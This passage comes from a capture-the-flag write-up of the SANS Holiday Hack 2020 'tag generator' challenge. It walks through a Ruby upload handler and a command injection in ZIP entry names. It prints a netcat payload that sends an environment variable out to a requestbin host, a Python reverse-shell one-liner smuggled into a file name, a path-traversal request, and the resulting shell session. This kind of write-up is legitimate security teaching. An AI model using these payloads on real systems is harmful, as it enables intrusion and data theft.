  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;files&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;map&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="n"&gt;process_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;flatten&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="k"&gt;end&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code&gt;process_files&lt;/code&gt; just calls &lt;code&gt;process_file&lt;/code&gt; (singular) for every
file in the list. So let's look at &lt;code&gt;process_file&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;process_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="n"&gt;out_files&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;[]&lt;/span&gt;

&lt;span class="hll"&gt;  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;downcase&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;end_with?&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;zip&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;    &lt;span class="c1"&gt;# Append the list returned by handle_zip&lt;/span&gt;
    &lt;span class="n"&gt;out_files&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;handle_zip&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="hll"&gt;  &lt;span class="k"&gt;elsif&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;downcase&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;end_with?&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;jpg&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;downcase&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;end_with?&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;jpeg&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;downcase&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;end_with?&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;png&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;    &lt;span class="c1"&gt;# Append the name returned by handle_image&lt;/span&gt;
    &lt;span class="n"&gt;out_files&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;handle_image&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="k"&gt;else&lt;/span&gt;
    &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Unsupported file type: &lt;/span&gt;&lt;span class="si"&gt;#{&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt; &lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
  &lt;span class="k"&gt;end&lt;/span&gt;

  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;out_files&lt;/span&gt;
&lt;span class="k"&gt;end&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;First of all, we see that our website can manage &lt;code&gt;.zip&lt;/code&gt; files. That's
interesting! I did try to upload ZIP files to the server, but I sent them with
a &lt;code&gt;.png&lt;/code&gt; extension to fool ImageMagick (oh God).&lt;/p&gt;
&lt;p&gt;Second, we can see that the server only accepts files with extensions
&lt;code&gt;.jpg&lt;/code&gt;, &lt;code&gt;.jpeg&lt;/code&gt;, or &lt;code&gt;.png&lt;/code&gt;. That's why our MVG, MSL, or SVG
files were refused by the server.&lt;/p&gt;
&lt;p&gt;Now, if the uploaded file is an image, &lt;code&gt;handle_image&lt;/code&gt; is called:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;handle_image&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="n"&gt;out_filename&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="si"&gt;#{&lt;/span&gt; &lt;span class="no"&gt;SecureRandom&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;uuid&lt;/span&gt; &lt;span class="si"&gt;}#{&lt;/span&gt;&lt;span class="no"&gt;File&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;extname&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;downcase&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
  &lt;span class="n"&gt;out_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="si"&gt;#{&lt;/span&gt; &lt;span class="no"&gt;FINAL_FOLDER&lt;/span&gt; &lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/&lt;/span&gt;&lt;span class="si"&gt;#{&lt;/span&gt; &lt;span class="n"&gt;out_filename&lt;/span&gt; &lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;

  &lt;span class="c1"&gt;# Resize and compress in the background&lt;/span&gt;
  &lt;span class="no"&gt;Thread&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;new&lt;/span&gt; &lt;span class="k"&gt;do&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nb"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;convert -resize 800x600&lt;/span&gt;&lt;span class="se"&gt;\\&lt;/span&gt;&lt;span class="s2"&gt;&amp;gt; -quality 75 &amp;#39;&lt;/span&gt;&lt;span class="si"&gt;#{&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt; &lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;#39; &amp;#39;&lt;/span&gt;&lt;span class="si"&gt;#{&lt;/span&gt; &lt;span class="n"&gt;out_path&lt;/span&gt; &lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;#39;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;      &lt;span class="no"&gt;LOGGER&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Something went wrong with file conversion: &lt;/span&gt;&lt;span class="si"&gt;#{&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt; &lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;else&lt;/span&gt;
      &lt;span class="no"&gt;LOGGER&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;debug&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;File successfully converted: &lt;/span&gt;&lt;span class="si"&gt;#{&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt; &lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;end&lt;/span&gt;
  &lt;span class="k"&gt;end&lt;/span&gt;

  &lt;span class="c1"&gt;# Return just the filename - we can figure that out later&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;out_filename&lt;/span&gt;
&lt;span class="k"&gt;end&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The server &lt;em&gt;does&lt;/em&gt; use &lt;code&gt;convert&lt;/code&gt; to process the images. And what's this!
It seems that the variable &lt;code&gt;filename&lt;/code&gt; is used without any sanitization
whatsoever before being used in &lt;code&gt;system&lt;/code&gt;! Could this mean that we can
execute arbitrary commands on the server? Well, not in this case, because, as
you remember, our uploaded files are put in a temporary folder, under a name
that is not under our control, so we can't put any funky characters to break
the syntax and execute arbitrary commands (that is something I did try during
black box mode).&lt;/p&gt;
&lt;p&gt;But what about the ZIP files? They are processed with &lt;code&gt;handle_zip&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;handle_zip&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="no"&gt;LOGGER&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;debug&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Processing &lt;/span&gt;&lt;span class="si"&gt;#{&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt; &lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt; as a zip&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="n"&gt;out_files&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;[]&lt;/span&gt;

  &lt;span class="no"&gt;Zip&lt;/span&gt;&lt;span class="o"&gt;::&lt;/span&gt;&lt;span class="no"&gt;File&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;do&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="n"&gt;zip_file&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;
    &lt;span class="c1"&gt;# Handle entries one by one&lt;/span&gt;
    &lt;span class="n"&gt;zip_file&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;each&lt;/span&gt; &lt;span class="k"&gt;do&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="n"&gt;entry&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;
      &lt;span class="no"&gt;LOGGER&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;debug&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Extracting &lt;/span&gt;&lt;span class="si"&gt;#{&lt;/span&gt;&lt;span class="n"&gt;entry&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

      &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;entry&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;size&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="no"&gt;MAX_SIZE&lt;/span&gt;
        &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;File too large when extracted&amp;#39;&lt;/span&gt;
      &lt;span class="k"&gt;end&lt;/span&gt;

      &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;entry&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;end_with?&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;zip&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Nested zip files are not supported!&amp;#39;&lt;/span&gt;
      &lt;span class="k"&gt;end&lt;/span&gt;

&lt;span class="hll"&gt;      &lt;span class="c1"&gt;# I wonder what this will do? --Jack&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;      &lt;span class="c1"&gt;# if entry.name !~ /^[a-zA-Z0-9._-]+$/&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;      &lt;span class="c1"&gt;#   raise &amp;#39;Invalid filename! Filenames may contain letters, numbers, period, underscore, and hyphen&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;      &lt;span class="c1"&gt;# end&lt;/span&gt;
&lt;/span&gt;
      &lt;span class="c1"&gt;# We want to extract into TMP_FOLDER&lt;/span&gt;
      &lt;span class="n"&gt;out_file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="si"&gt;#{&lt;/span&gt; &lt;span class="no"&gt;TMP_FOLDER&lt;/span&gt; &lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/&lt;/span&gt;&lt;span class="si"&gt;#{&lt;/span&gt; &lt;span class="n"&gt;entry&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;

      &lt;span class="c1"&gt;# Extract to file or directory based on name in the archive&lt;/span&gt;
      &lt;span class="n"&gt;entry&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;extract&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;out_file&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c1"&gt;# If the file exists, simply overwrite&lt;/span&gt;
        &lt;span class="kp"&gt;true&lt;/span&gt;
      &lt;span class="p"&gt;}&lt;/span&gt;

      &lt;span class="c1"&gt;# Process it&lt;/span&gt;
&lt;span class="hll"&gt;      &lt;span class="n"&gt;out_files&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;process_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;out_file&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;    &lt;span class="k"&gt;end&lt;/span&gt;
  &lt;span class="k"&gt;end&lt;/span&gt;

  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;out_files&lt;/span&gt;
&lt;span class="k"&gt;end&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once again, Jack Frost has disabled the validation of the file names &lt;em&gt;inside
our ZIP file&lt;/em&gt;. That means that we have full control over the variable
&lt;code&gt;out_file&lt;/code&gt; before it's sent to &lt;code&gt;process_file&lt;/code&gt;. &lt;em&gt;Now&lt;/em&gt; we have a
remote code execution vulnerability!&lt;/p&gt;
&lt;p&gt;&lt;em&gt;NB: we also have the possibility to overwrite any file. My first thought was
to maybe overwrite the&lt;/em&gt; &lt;code&gt;app.rb&lt;/code&gt; &lt;em&gt;file with a malicious one where we
could implement a webshell, but I didn't want to accidently screw up the
challenge and leave it unavailable, so I took the safe route.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;So, let's take a look at the syntax of the command we have to break out of:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
convert -resize 800x600\&amp;gt; -quality 75 '$our_entry_point' 'blah_blah_we_dont_control_this'
&lt;/pre&gt;
&lt;p&gt;So, we have to escape out of our enclosure of single quotes, and then maybe
comment out the rest of the command. We also have to end our file name with an
allowed extension, such as &lt;code&gt;.png&lt;/code&gt;, or &lt;code&gt;process_file&lt;/code&gt; will refuse to
process it. What about our payload? Well, we want to exfiltrate the value of
&lt;code&gt;GREETZ&lt;/code&gt; so we can maybe do something like using &lt;a class="reference external" href="http://requestbin.net/dns"&gt;DNSBin&lt;/a&gt; to get the value we want.&lt;/p&gt;
&lt;p&gt;I first tried using &lt;code&gt;nslookup&lt;/code&gt;, then &lt;code&gt;host&lt;/code&gt;, but it didn't work. I
used the file include vulnerability in &lt;code&gt;/image&lt;/code&gt; to see if the binaries
were on the system, but they didn't seem to be. So then I used the file include
to read &lt;code&gt;/var/log/dpkg.log&lt;/code&gt;, and I noticed that
&lt;code&gt;netcat-traditional&lt;/code&gt; was installed:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/image?id=../var/log/dpkg.log&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;tag-generator.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;image/webp,*/*&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://tag-generator.kringlecastle.com/&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Wed, 30 Dec 2020 12:50:08 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;image/jpeg&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;172239&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;X-Content-Type-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nosniff&lt;/span&gt;
&lt;span class="na"&gt;Strict-Transport-Security&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;max-age=15552000; includeSubDomains&lt;/span&gt;
&lt;span class="na"&gt;X-XSS-Protection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1; mode=block&lt;/span&gt;
&lt;span class="na"&gt;X-Robots-Tag&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;none&lt;/span&gt;
&lt;span class="na"&gt;X-Download-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;noopen&lt;/span&gt;
&lt;span class="na"&gt;X-Permitted-Cross-Domain-Policies&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;none&lt;/span&gt;

[snip]
2020-11-09 19:36:45 configure netcat-traditional:amd64 1.10-41.1 &amp;lt;none&amp;gt;
2020-11-09 19:36:45 status unpacked netcat-traditional:amd64 1.10-41.1
2020-11-09 19:36:45 status half-configured netcat-traditional:amd64 1.10-41.1
2020-11-09 19:36:45 status installed netcat-traditional:amd64 1.10-41.1
[snip]
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So I decided to use &lt;code&gt;netcat&lt;/code&gt; in my payload. Here's the name of the file:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
test' `netcat $GREETZ.e44b0bd64a85d892c995.d.requestbin.net` # .png
&lt;/pre&gt;
&lt;p&gt;It was created with the following command:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; touch &lt;span class="s2"&gt;&amp;quot;test&amp;#39; &amp;quot;&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;`netcat $GREETZ.e44b0bd64a85d892c995.d.requestbin.net` # .png&amp;#39;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The single quote after &lt;code&gt;test&lt;/code&gt; will allow us to escape of our syntax.
I then used backticks to execute my payload. Finally, I commented out the rest
of the command with &lt;code&gt;#&lt;/code&gt;, and ended with &lt;code&gt;.png&lt;/code&gt; to trick
&lt;code&gt;process_file&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Let's put our file in a ZIP and upload it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; zip payload.zip ./test&lt;span class="se"&gt;\&amp;#39;\ \`&lt;/span&gt;netcat&lt;span class="se"&gt;\ \$&lt;/span&gt;GREETZ.e44b0bd64a85d892c995.d.requestbin.net&lt;span class="se"&gt;\`\ \#\ &lt;/span&gt;.png
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Thank God for auto-completion. And after our upload:&lt;/p&gt;
&lt;img alt="tag_generator_dnsbin.png" class="align-center" src="/images/sans-christmas-challenge-2020/tag_generator_dnsbin.png" /&gt;
&lt;p&gt;Bingo! We get our desired value.&lt;/p&gt;
&lt;p&gt;But you know what would be even cooler? Getting a shell on the server. So let's
change our payload to get a reverse shell. You will need a server binding on
a public IP address. I used Python for my payload (after checking that it was
present on the server) but feel free to use anything. Here's my payload:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(($PUT_YOUR_IP_HERE,$PUT_YOUR_PORT_HERE));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&amp;quot;\x2fbin\x2fsh&amp;quot;,&amp;quot;-i&amp;quot;]);'
&lt;/pre&gt;
&lt;p&gt;You'll notice that I had to encode &lt;code&gt;/bin/sh&lt;/code&gt; as &lt;code&gt;\x2fbin\x2fsh&lt;/code&gt;.
That's because you can't have forward slash in a file name on Linux.&lt;/p&gt;
&lt;p&gt;Now, we can create our file, &lt;code&gt;zip&lt;/code&gt; it, and upload it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; rm payload.zip
&lt;span class="gp"&gt;$&lt;/span&gt; touch &lt;span class="s2"&gt;&amp;quot;test&amp;#39; &amp;quot;&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;`python3 -c &amp;#39;&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;#39;&amp;quot;&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(($PUT_YOUR_IP_HERE,$PUT_YOUR_PORT_HERE));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&amp;quot;\x2fbin\x2fsh&amp;quot;,&amp;quot;-i&amp;quot;]);&amp;#39;&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;#39;&amp;quot;&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;` # .png&amp;#39;&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; zip payload.zip test*
&lt;span class="go"&gt;  adding: test&amp;#39; `python3 -c [snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;And on our reverse shell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;reverse~$ nc -nlvp &amp;lt;port&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;listening on [any] &amp;lt;port&amp;gt; ...&lt;/span&gt;
&lt;span class="go"&gt;connect to [x.x.x.x] from (UNKNOWN) [35.232.236.115] 49528&lt;/span&gt;
&lt;span class="go"&gt;/bin/sh: 0: can&amp;#39;t access tty; job control turned off&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; whoami
&lt;span class="go"&gt;app&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;pwd&lt;/span&gt;
&lt;span class="go"&gt;/tmp&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; date
&lt;span class="go"&gt;Wed Dec 30 16:59:34 UTC 2020&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; cat /etc/debian_version
&lt;span class="go"&gt;10.3&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; ip a sh eth0
&lt;span class="go"&gt;167: eth0@if168: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP group default&lt;/span&gt;
&lt;span class="go"&gt;    link/ether 02:42:ac:14:00:04 brd ff:ff:ff:ff:ff:ff link-netnsid 0&lt;/span&gt;
&lt;span class="go"&gt;    inet 172.20.0.4/16 brd 172.20.255.255 scope global eth0&lt;/span&gt;
&lt;span class="go"&gt;       valid_lft forever preferred_lft forever&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$GREETZ&lt;/span&gt;
&lt;span class="go"&gt;JackFrostWasHere&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ah! It was indeed a Debian Buster.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-9"&gt;
